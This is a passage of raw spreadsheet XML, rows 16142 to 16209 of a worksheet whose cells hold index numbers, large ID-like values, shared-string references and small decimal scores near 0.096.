      </c>
      <c r="C16142" s="2" t="s">
        <v>15581</v>
      </c>
      <c r="D16142" s="2">
        <v>1.0</v>
      </c>
      <c r="E16142" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16142" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="16143" ht="15.75" customHeight="1">
      <c r="A16143" s="1">
        <v>14218.0</v>
      </c>
      <c r="B16143" s="2">
        <v>3.8283999E7</v>
      </c>
      <c r="C16143" s="2" t="s">
        <v>15582</v>
      </c>
      <c r="D16143" s="2">
        <v>1.0</v>
      </c>
      <c r="E16143" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16143" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="16144" ht="15.75" customHeight="1">
      <c r="A16144" s="1">
        <v>16239.0</v>
      </c>
      <c r="B16144" s="2">
        <v>4.5769314E7</v>
      </c>
      <c r="C16144" s="2" t="s">
        <v>15583</v>
      </c>
      <c r="D16144" s="2">
        <v>1.0</v>
      </c>
      <c r="E16144" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16144" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="16145" ht="15.75" customHeight="1">
      <c r="A16145" s="1">
        <v>25173.0</v>
      </c>
      <c r="B16145" s="2">
        <v>1.3112147E7</v>
      </c>
      <c r="C16145" s="2" t="s">
        <v>15584</v>
      </c>
      <c r="D16145" s="2">
        <v>1.0</v>
      </c>
      <c r="E16145" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16145" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="16146" ht="15.75" customHeight="1">
      <c r="A16146" s="1">
        <v>1422.0</v>
      </c>
      <c r="B16146" s="2">
        <v>2.6564299E7</v>
      </c>
      <c r="C16146" s="2" t="s">
        <v>15585</v>
      </c>
      <c r="D16146" s="2">
        <v>1.0</v>
      </c>
      <c r="E16146" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16146" s="2">
        <v>0.0969498910675381</v>
      </c>
    </row>
    <row r="16147" ht="15.75" customHeight="1">
      <c r="A16147" s="1">
        <v>14955.0</v>
      </c>
      <c r="B16147" s="2">
        <v>4.1318615E7</v>
      </c>
      <c r="C16147" s="2" t="s">
        <v>15586</v>
      </c>
      <c r="D16147" s="2">
        <v>1.0</v>
      </c>
      <c r="E16147" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16147" s="2">
        <v>0.0969498910675381</v>
      </c>
    </row>
    <row r="16148" ht="15.75" customHeight="1">
      <c r="A16148" s="1">
        <v>32321.0</v>
      </c>
      <c r="B16148" s="2">
        <v>5575500.0</v>
      </c>
      <c r="C16148" s="2" t="s">
        <v>15587</v>
      </c>
      <c r="D16148" s="2">
        <v>1.0</v>
      </c>
      <c r="E16148" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16148" s="2">
        <v>0.0969498910675381</v>
      </c>
    </row>
    <row r="16149" ht="15.75" customHeight="1">
      <c r="A16149" s="1">
        <v>715.0</v>
      </c>
      <c r="B16149" s="2">
        <v>2.0613251E7</v>
      </c>
      <c r="C16149" s="2" t="s">
        <v>15588</v>
      </c>
      <c r="D16149" s="2">
        <v>1.0</v>
      </c>
      <c r="E16149" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16149" s="2">
        <v>0.09674329501915707</v>
      </c>
    </row>
    <row r="16150" ht="15.75" customHeight="1">
      <c r="A16150" s="1">
        <v>6433.0</v>
      </c>
      <c r="B16150" s="2">
        <v>4.8581402E7</v>
      </c>
      <c r="C16150" s="2" t="s">
        <v>15589</v>
      </c>
      <c r="D16150" s="2">
        <v>1.0</v>
      </c>
      <c r="E16150" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16150" s="2">
        <v>0.09674329501915707</v>
      </c>
    </row>
    <row r="16151" ht="15.75" customHeight="1">
      <c r="A16151" s="1">
        <v>26968.0</v>
      </c>
      <c r="B16151" s="2">
        <v>1.9640834E7</v>
      </c>
      <c r="C16151" s="2" t="s">
        <v>15590</v>
      </c>
      <c r="D16151" s="2">
        <v>1.0</v>
      </c>
      <c r="E16151" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16151" s="2">
        <v>0.09674329501915707</v>
      </c>
    </row>
    <row r="16152" ht="15.75" customHeight="1">
      <c r="A16152" s="1">
        <v>984.0</v>
      </c>
      <c r="B16152" s="2">
        <v>2.2857939E7</v>
      </c>
      <c r="C16152" s="2" t="s">
        <v>15591</v>
      </c>
      <c r="D16152" s="2">
        <v>1.0</v>
      </c>
      <c r="E16152" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16152" s="2">
        <v>0.09649122807017543</v>
      </c>
    </row>
    <row r="16153" ht="15.75" customHeight="1">
      <c r="A16153" s="1">
        <v>23613.0</v>
      </c>
      <c r="B16153" s="2">
        <v>6428794.0</v>
      </c>
      <c r="C16153" s="2" t="s">
        <v>15140</v>
      </c>
      <c r="D16153" s="2">
        <v>1.0</v>
      </c>
      <c r="E16153" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16153" s="2">
        <v>0.09649122807017543</v>
      </c>
    </row>
    <row r="16154" ht="15.75" customHeight="1">
      <c r="A16154" s="1">
        <v>27206.0</v>
      </c>
      <c r="B16154" s="2">
        <v>2.0951989E7</v>
      </c>
      <c r="C16154" s="2" t="s">
        <v>15592</v>
      </c>
      <c r="D16154" s="2">
        <v>1.0</v>
      </c>
      <c r="E16154" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16154" s="2">
        <v>0.09649122807017543</v>
      </c>
    </row>
    <row r="16155" ht="15.75" customHeight="1">
      <c r="A16155" s="1">
        <v>27645.0</v>
      </c>
      <c r="B16155" s="2">
        <v>2.2763987E7</v>
      </c>
      <c r="C16155" s="2" t="s">
        <v>15593</v>
      </c>
      <c r="D16155" s="2">
        <v>1.0</v>
      </c>
      <c r="E16155" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16155" s="2">
        <v>0.09649122807017543</v>
      </c>
    </row>
    <row r="16156" ht="15.75" customHeight="1">
      <c r="A16156" s="1">
        <v>28363.0</v>
      </c>
      <c r="B16156" s="2">
        <v>2.6023306E7</v>
      </c>
      <c r="C16156" s="2" t="s">
        <v>7012</v>
      </c>
      <c r="D16156" s="2">
        <v>1.0</v>
      </c>
      <c r="E16156" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16156" s="2">
        <v>0.09635416666666666</v>
      </c>
    </row>
    <row r="16157" ht="15.75" customHeight="1">
      <c r="A16157" s="1">
        <v>5843.0</v>
      </c>
      <c r="B16157" s="2">
        <v>4.6923482E7</v>
      </c>
      <c r="C16157" s="2" t="s">
        <v>15594</v>
      </c>
      <c r="D16157" s="2">
        <v>1.0</v>
      </c>
      <c r="E16157" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16157" s="2">
        <v>0.09623015873015874</v>
      </c>
    </row>
    <row r="16158" ht="15.75" customHeight="1">
      <c r="A16158" s="1">
        <v>31480.0</v>
      </c>
      <c r="B16158" s="2">
        <v>5048683.0</v>
      </c>
      <c r="C16158" s="2" t="s">
        <v>15595</v>
      </c>
      <c r="D16158" s="2">
        <v>1.0</v>
      </c>
      <c r="E16158" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16158" s="2">
        <v>0.09623015873015872</v>
      </c>
    </row>
    <row r="16159" ht="15.75" customHeight="1">
      <c r="A16159" s="1">
        <v>8381.0</v>
      </c>
      <c r="B16159" s="2">
        <v>5.3821318E7</v>
      </c>
      <c r="C16159" s="2" t="s">
        <v>15596</v>
      </c>
      <c r="D16159" s="2">
        <v>1.0</v>
      </c>
      <c r="E16159" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16159" s="2">
        <v>0.09595959595959597</v>
      </c>
    </row>
    <row r="16160" ht="15.75" customHeight="1">
      <c r="A16160" s="1">
        <v>3965.0</v>
      </c>
      <c r="B16160" s="2">
        <v>4.072323E7</v>
      </c>
      <c r="C16160" s="2" t="s">
        <v>15597</v>
      </c>
      <c r="D16160" s="2">
        <v>1.0</v>
      </c>
      <c r="E16160" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16160" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="16161" ht="15.75" customHeight="1">
      <c r="A16161" s="1">
        <v>12890.0</v>
      </c>
      <c r="B16161" s="2">
        <v>3.2050736E7</v>
      </c>
      <c r="C16161" s="2" t="s">
        <v>15598</v>
      </c>
      <c r="D16161" s="2">
        <v>1.0</v>
      </c>
      <c r="E16161" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16161" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="16162" ht="15.75" customHeight="1">
      <c r="A16162" s="1">
        <v>21019.0</v>
      </c>
      <c r="B16162" s="2">
        <v>1.7382869E7</v>
      </c>
      <c r="C16162" s="2" t="s">
        <v>15599</v>
      </c>
      <c r="D16162" s="2">
        <v>1.0</v>
      </c>
      <c r="E16162" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16162" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="16163" ht="15.75" customHeight="1">
      <c r="A16163" s="1">
        <v>25332.0</v>
      </c>
      <c r="B16163" s="2">
        <v>1.3474356E7</v>
      </c>
      <c r="C16163" s="2" t="s">
        <v>15600</v>
      </c>
      <c r="D16163" s="2">
        <v>1.0</v>
      </c>
      <c r="E16163" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16163" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="16164" ht="15.75" customHeight="1">
      <c r="A16164" s="1">
        <v>32884.0</v>
      </c>
      <c r="B16164" s="2">
        <v>6356526.0</v>
      </c>
      <c r="C16164" s="2" t="s">
        <v>7357</v>
      </c>
      <c r="D16164" s="2">
        <v>1.0</v>
      </c>
      <c r="E16164" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16164" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="16165" ht="15.75" customHeight="1">
      <c r="A16165" s="1">
        <v>9479.0</v>
      </c>
      <c r="B16165" s="2">
        <v>5.5884122E7</v>
      </c>
      <c r="C16165" s="2" t="s">
        <v>15601</v>
      </c>
      <c r="D16165" s="2">
        <v>1.0</v>
      </c>
      <c r="E16165" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16165" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="16166" ht="15.75" customHeight="1">
      <c r="A16166" s="1">
        <v>17560.0</v>
      </c>
      <c r="B16166" s="2">
        <v>5.0226965E7</v>
      </c>
      <c r="C16166" s="2" t="s">
        <v>15602</v>
      </c>
      <c r="D16166" s="2">
        <v>1.0</v>
      </c>
      <c r="E16166" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16166" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="16167" ht="15.75" customHeight="1">
      <c r="A16167" s="1">
        <v>28579.0</v>
      </c>
      <c r="B16167" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C16167" s="2" t="s">
        <v>15603</v>
      </c>
      <c r="D16167" s="2">
        <v>1.0</v>
      </c>
      <c r="E16167" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16167" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="16168" ht="15.75" customHeight="1">
      <c r="A16168" s="1">
        <v>2172.0</v>
      </c>
      <c r="B16168" s="2">
        <v>3.17669E7</v>
      </c>
      <c r="C16168" s="2" t="s">
        <v>15604</v>
      </c>
      <c r="D16168" s="2">
        <v>1.0</v>
      </c>
      <c r="E16168" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16168" s="2">
        <v>0.09595959595959593</v>
      </c>
    </row>
    <row r="16169" ht="15.75" customHeight="1">
      <c r="A16169" s="1">
        <v>6902.0</v>
      </c>
      <c r="B16169" s="2">
        <v>4.9810528E7</v>
      </c>
      <c r="C16169" s="2" t="s">
        <v>15605</v>
      </c>
      <c r="D16169" s="2">
        <v>1.0</v>
      </c>
      <c r="E16169" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16169" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="16170" ht="15.75" customHeight="1">
      <c r="A16170" s="1">
        <v>8533.0</v>
      </c>
      <c r="B16170" s="2">
        <v>5.4104697E7</v>
      </c>
      <c r="C16170" s="2" t="s">
        <v>15606</v>
      </c>
      <c r="D16170" s="2">
        <v>1.0</v>
      </c>
      <c r="E16170" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16170" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="16171" ht="15.75" customHeight="1">
      <c r="A16171" s="1">
        <v>9122.0</v>
      </c>
      <c r="B16171" s="2">
        <v>5.5216762E7</v>
      </c>
      <c r="C16171" s="2" t="s">
        <v>15607</v>
      </c>
      <c r="D16171" s="2">
        <v>1.0</v>
      </c>
      <c r="E16171" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16171" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="16172" ht="15.75" customHeight="1">
      <c r="A16172" s="1">
        <v>27191.0</v>
      </c>
      <c r="B16172" s="2">
        <v>2.0902385E7</v>
      </c>
      <c r="C16172" s="2" t="s">
        <v>15608</v>
      </c>
      <c r="D16172" s="2">
        <v>1.0</v>
      </c>
      <c r="E16172" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16172" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="16173" ht="15.75" customHeight="1">
      <c r="A16173" s="1">
        <v>29586.0</v>
      </c>
      <c r="B16173" s="2">
        <v>3.3516662E7</v>
      </c>
      <c r="C16173" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="D16173" s="2">
        <v>1.0</v>
      </c>
      <c r="E16173" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16173" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="16174" ht="15.75" customHeight="1">
      <c r="A16174" s="1">
        <v>33491.0</v>
      </c>
      <c r="B16174" s="2">
        <v>8001451.0</v>
      </c>
      <c r="C16174" s="2" t="s">
        <v>15610</v>
      </c>
      <c r="D16174" s="2">
        <v>1.0</v>
      </c>
      <c r="E16174" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16174" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="16175" ht="15.75" customHeight="1">
      <c r="A16175" s="1">
        <v>33.0</v>
      </c>
      <c r="B16175" s="2">
        <v>1.0538861E7</v>
      </c>
      <c r="C16175" s="2" t="s">
        <v>15611</v>
      </c>
      <c r="D16175" s="2">
        <v>1.0</v>
      </c>
      <c r="E16175" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16175" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16176" ht="15.75" customHeight="1">
      <c r="A16176" s="1">
        <v>578.0</v>
      </c>
      <c r="B16176" s="2">
        <v>1.9113045E7</v>
      </c>
      <c r="C16176" s="2" t="s">
        <v>15612</v>
      </c>
      <c r="D16176" s="2">
        <v>1.0</v>
      </c>
      <c r="E16176" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16176" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16177" ht="15.75" customHeight="1">
      <c r="A16177" s="1">
        <v>643.0</v>
      </c>
      <c r="B16177" s="2">
        <v>1.9870781E7</v>
      </c>
      <c r="C16177" s="2" t="s">
        <v>15613</v>
      </c>
      <c r="D16177" s="2">
        <v>1.0</v>
      </c>
      <c r="E16177" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16177" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16178" ht="15.75" customHeight="1">
      <c r="A16178" s="1">
        <v>1129.0</v>
      </c>
      <c r="B16178" s="2">
        <v>2.4182246E7</v>
      </c>
      <c r="C16178" s="2" t="s">
        <v>15614</v>
      </c>
      <c r="D16178" s="2">
        <v>1.0</v>
      </c>
      <c r="E16178" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16178" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16179" ht="15.75" customHeight="1">
      <c r="A16179" s="1">
        <v>1409.0</v>
      </c>
      <c r="B16179" s="2">
        <v>2.6378514E7</v>
      </c>
      <c r="C16179" s="2" t="s">
        <v>15615</v>
      </c>
      <c r="D16179" s="2">
        <v>1.0</v>
      </c>
      <c r="E16179" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16179" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16180" ht="15.75" customHeight="1">
      <c r="A16180" s="1">
        <v>1704.0</v>
      </c>
      <c r="B16180" s="2">
        <v>2.8568666E7</v>
      </c>
      <c r="C16180" s="2" t="s">
        <v>15616</v>
      </c>
      <c r="D16180" s="2">
        <v>1.0</v>
      </c>
      <c r="E16180" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16180" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16181" ht="15.75" customHeight="1">
      <c r="A16181" s="1">
        <v>2116.0</v>
      </c>
      <c r="B16181" s="2">
        <v>3.1375928E7</v>
      </c>
      <c r="C16181" s="2" t="s">
        <v>15617</v>
      </c>
      <c r="D16181" s="2">
        <v>1.0</v>
      </c>
      <c r="E16181" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16181" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16182" ht="15.75" customHeight="1">
      <c r="A16182" s="1">
        <v>2299.0</v>
      </c>
      <c r="B16182" s="2">
        <v>3.2663415E7</v>
      </c>
      <c r="C16182" s="2" t="s">
        <v>15618</v>
      </c>
      <c r="D16182" s="2">
        <v>1.0</v>
      </c>
      <c r="E16182" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16182" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16183" ht="15.75" customHeight="1">
      <c r="A16183" s="1">
        <v>2709.0</v>
      </c>
      <c r="B16183" s="2">
        <v>3.4877025E7</v>
      </c>
      <c r="C16183" s="2" t="s">
        <v>15619</v>
      </c>
      <c r="D16183" s="2">
        <v>1.0</v>
      </c>
      <c r="E16183" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16183" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16184" ht="15.75" customHeight="1">
      <c r="A16184" s="1">
        <v>3507.0</v>
      </c>
      <c r="B16184" s="2">
        <v>3.8543758E7</v>
      </c>
      <c r="C16184" s="2" t="s">
        <v>15620</v>
      </c>
      <c r="D16184" s="2">
        <v>1.0</v>
      </c>
      <c r="E16184" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16184" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16185" ht="15.75" customHeight="1">
      <c r="A16185" s="1">
        <v>4957.0</v>
      </c>
      <c r="B16185" s="2">
        <v>4.4067525E7</v>
      </c>
      <c r="C16185" s="2" t="s">
        <v>15621</v>
      </c>
      <c r="D16185" s="2">
        <v>1.0</v>
      </c>
      <c r="E16185" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16185" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16186" ht="15.75" customHeight="1">
      <c r="A16186" s="1">
        <v>6778.0</v>
      </c>
      <c r="B16186" s="2">
        <v>4.9449765E7</v>
      </c>
      <c r="C16186" s="2" t="s">
        <v>15622</v>
      </c>
      <c r="D16186" s="2">
        <v>1.0</v>
      </c>
      <c r="E16186" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16186" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16187" ht="15.75" customHeight="1">
      <c r="A16187" s="1">
        <v>6794.0</v>
      </c>
      <c r="B16187" s="2">
        <v>4.951033E7</v>
      </c>
      <c r="C16187" s="2" t="s">
        <v>15623</v>
      </c>
      <c r="D16187" s="2">
        <v>1.0</v>
      </c>
      <c r="E16187" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16187" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16188" ht="15.75" customHeight="1">
      <c r="A16188" s="1">
        <v>7379.0</v>
      </c>
      <c r="B16188" s="2">
        <v>5.1052223E7</v>
      </c>
      <c r="C16188" s="2" t="s">
        <v>15624</v>
      </c>
      <c r="D16188" s="2">
        <v>1.0</v>
      </c>
      <c r="E16188" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16188" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16189" ht="15.75" customHeight="1">
      <c r="A16189" s="1">
        <v>7693.0</v>
      </c>
      <c r="B16189" s="2">
        <v>5.1956929E7</v>
      </c>
      <c r="C16189" s="2" t="s">
        <v>15625</v>
      </c>
      <c r="D16189" s="2">
        <v>1.0</v>
      </c>
      <c r="E16189" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16189" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16190" ht="15.75" customHeight="1">
      <c r="A16190" s="1">
        <v>7707.0</v>
      </c>
      <c r="B16190" s="2">
        <v>5.1996068E7</v>
      </c>
      <c r="C16190" s="2" t="s">
        <v>15626</v>
      </c>
      <c r="D16190" s="2">
        <v>1.0</v>
      </c>
      <c r="E16190" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16190" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16191" ht="15.75" customHeight="1">
      <c r="A16191" s="1">
        <v>7878.0</v>
      </c>
      <c r="B16191" s="2">
        <v>5.2412681E7</v>
      </c>
      <c r="C16191" s="2" t="s">
        <v>15627</v>
      </c>
      <c r="D16191" s="2">
        <v>1.0</v>
      </c>
      <c r="E16191" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16191" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16192" ht="15.75" customHeight="1">
      <c r="A16192" s="1">
        <v>8305.0</v>
      </c>
      <c r="B16192" s="2">
        <v>5.3585059E7</v>
      </c>
      <c r="C16192" s="2" t="s">
        <v>15628</v>
      </c>
      <c r="D16192" s="2">
        <v>1.0</v>
      </c>
      <c r="E16192" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16192" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16193" ht="15.75" customHeight="1">
      <c r="A16193" s="1">
        <v>8370.0</v>
      </c>
      <c r="B16193" s="2">
        <v>5.3800706E7</v>
      </c>
      <c r="C16193" s="2" t="s">
        <v>15629</v>
      </c>
      <c r="D16193" s="2">
        <v>1.0</v>
      </c>
      <c r="E16193" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16193" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16194" ht="15.75" customHeight="1">
      <c r="A16194" s="1">
        <v>8613.0</v>
      </c>
      <c r="B16194" s="2">
        <v>5.4267144E7</v>
      </c>
      <c r="C16194" s="2" t="s">
        <v>15630</v>
      </c>
      <c r="D16194" s="2">
        <v>1.0</v>
      </c>
      <c r="E16194" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16194" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16195" ht="15.75" customHeight="1">
      <c r="A16195" s="1">
        <v>8933.0</v>
      </c>
      <c r="B16195" s="2">
        <v>5.4852946E7</v>
      </c>
      <c r="C16195" s="2" t="s">
        <v>15631</v>
      </c>
      <c r="D16195" s="2">
        <v>1.0</v>
      </c>
      <c r="E16195" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16195" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16196" ht="15.75" customHeight="1">
      <c r="A16196" s="1">
        <v>9560.0</v>
      </c>
      <c r="B16196" s="2">
        <v>5.6045187E7</v>
      </c>
      <c r="C16196" s="2" t="s">
        <v>15632</v>
      </c>
      <c r="D16196" s="2">
        <v>1.0</v>
      </c>
      <c r="E16196" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16196" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16197" ht="15.75" customHeight="1">
      <c r="A16197" s="1">
        <v>9602.0</v>
      </c>
      <c r="B16197" s="2">
        <v>5.6150125E7</v>
      </c>
      <c r="C16197" s="2" t="s">
        <v>15633</v>
      </c>
      <c r="D16197" s="2">
        <v>1.0</v>
      </c>
      <c r="E16197" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16197" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16198" ht="15.75" customHeight="1">
      <c r="A16198" s="1">
        <v>9905.0</v>
      </c>
      <c r="B16198" s="2">
        <v>5.6781806E7</v>
      </c>
      <c r="C16198" s="2" t="s">
        <v>15634</v>
      </c>
      <c r="D16198" s="2">
        <v>1.0</v>
      </c>
      <c r="E16198" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16198" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16199" ht="15.75" customHeight="1">
      <c r="A16199" s="1">
        <v>10172.0</v>
      </c>
      <c r="B16199" s="2">
        <v>5.7376045E7</v>
      </c>
      <c r="C16199" s="2" t="s">
        <v>15635</v>
      </c>
      <c r="D16199" s="2">
        <v>1.0</v>
      </c>
      <c r="E16199" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16199" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16200" ht="15.75" customHeight="1">
      <c r="A16200" s="1">
        <v>10204.0</v>
      </c>
      <c r="B16200" s="2">
        <v>5.7407363E7</v>
      </c>
      <c r="C16200" s="2" t="s">
        <v>15636</v>
      </c>
      <c r="D16200" s="2">
        <v>1.0</v>
      </c>
      <c r="E16200" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16200" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16201" ht="15.75" customHeight="1">
      <c r="A16201" s="1">
        <v>10860.0</v>
      </c>
      <c r="B16201" s="2">
        <v>1.6319565E7</v>
      </c>
      <c r="C16201" s="2" t="s">
        <v>15637</v>
      </c>
      <c r="D16201" s="2">
        <v>1.0</v>
      </c>
      <c r="E16201" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16201" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16202" ht="15.75" customHeight="1">
      <c r="A16202" s="1">
        <v>11837.0</v>
      </c>
      <c r="B16202" s="2">
        <v>2.4705463E7</v>
      </c>
      <c r="C16202" s="2" t="s">
        <v>15638</v>
      </c>
      <c r="D16202" s="2">
        <v>1.0</v>
      </c>
      <c r="E16202" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16202" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16203" ht="15.75" customHeight="1">
      <c r="A16203" s="1">
        <v>12343.0</v>
      </c>
      <c r="B16203" s="2">
        <v>2.8612019E7</v>
      </c>
      <c r="C16203" s="2" t="s">
        <v>15639</v>
      </c>
      <c r="D16203" s="2">
        <v>1.0</v>
      </c>
      <c r="E16203" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16203" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16204" ht="15.75" customHeight="1">
      <c r="A16204" s="1">
        <v>12976.0</v>
      </c>
      <c r="B16204" s="2">
        <v>3.2623992E7</v>
      </c>
      <c r="C16204" s="2" t="s">
        <v>15640</v>
      </c>
      <c r="D16204" s="2">
        <v>1.0</v>
      </c>
      <c r="E16204" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16204" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16205" ht="15.75" customHeight="1">
      <c r="A16205" s="1">
        <v>13271.0</v>
      </c>
      <c r="B16205" s="2">
        <v>3.4377855E7</v>
      </c>
      <c r="C16205" s="2" t="s">
        <v>15641</v>
      </c>
      <c r="D16205" s="2">
        <v>1.0</v>
      </c>
      <c r="E16205" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16205" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16206" ht="15.75" customHeight="1">
      <c r="A16206" s="1">
        <v>14854.0</v>
      </c>
      <c r="B16206" s="2">
        <v>4.1061854E7</v>
      </c>
      <c r="C16206" s="2" t="s">
        <v>15642</v>
      </c>
      <c r="D16206" s="2">
        <v>1.0</v>
      </c>
      <c r="E16206" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16206" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16207" ht="15.75" customHeight="1">
      <c r="A16207" s="1">
        <v>15199.0</v>
      </c>
      <c r="B16207" s="2">
        <v>4.2069036E7</v>
      </c>
      <c r="C16207" s="2" t="s">
        <v>15643</v>
      </c>
      <c r="D16207" s="2">
        <v>1.0</v>
      </c>
      <c r="E16207" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16207" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16208" ht="15.75" customHeight="1">
      <c r="A16208" s="1">
        <v>15502.0</v>
      </c>
      <c r="B16208" s="2">
        <v>4.3216474E7</v>
      </c>
      <c r="C16208" s="2" t="s">
        <v>15644</v>
      </c>
      <c r="D16208" s="2">
        <v>1.0</v>
      </c>
      <c r="E16208" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16208" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="16209" ht="15.75" customHeight="1">
      <c r="A16209" s="1">
        <v>16762.0</v>
      </c>
      <c r="B16209" s="2">
        <v>4.7627487E7</v>
      </c>
